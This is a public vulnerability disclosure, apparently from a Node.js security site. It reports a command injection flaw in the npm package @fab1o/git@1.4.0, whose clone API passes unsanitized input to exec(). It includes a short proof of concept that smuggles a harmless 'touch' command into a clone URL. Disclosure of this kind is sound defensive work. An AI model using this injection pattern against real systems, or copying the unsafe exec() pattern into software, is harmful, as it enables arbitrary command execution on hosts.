🦄 Node.js Security

~ 1 min read

Command Injection vulnerability in `@fab1o/git@1.4.0`

share on
A Command Injection vulnerability in the `@fab1o/git` npm package allows attackers to execute arbitrary commands on the host system via unsanitized user input passed to the `exec()` function.

This write-up is a public report of the Command Injection vulnerability in @fab1o/git@1.4.0 which I reported to the maintainer yet received no response.

The @fab1o/git npm library describes itself as a wrapper for command line git with promises.

Resources:

Background on exploitation

I’m reporting a Command Injection vulnerability in @fab1o/git npm package.

This vulnerability manifests with the library’s clone API, which allows user input to specify the remote URL to clone and then concatenates this string along with a git command which is then passed to the unsafe exec() Node.js child process API.

It should be noted that other function methods exposed as user-facing APIs are also vulnerable.

Exploit

  1. Install @fab1o/git@1.4.0 or earlier
  2. Establish the following POC:
const { Git } = require("@fab1o/git");
var git = new Git();


git
  .clone(
    "https://github.com/sayden/git-command-line.git; touch /tmp/readyplayerone"
  )
  .then(function (res) {
    console.log(res);
  })
  .catch(function (err) {
    console.error(err);
  });
  1. Observe new file created on disk at /tmp/readyplayerone

Node.js Security Newsletter

Subscribe to get everything in and around the Node.js security ecosystem, direct to your inbox.

    JavaScript & web security insights, latest security vulnerabilities, hands-on secure code insights, npm ecosystem incidents, Node.js runtime feature updates, Bun and Deno runtime updates, secure coding best practices, malware, malicious packages, and more.

    Built with ConvertKit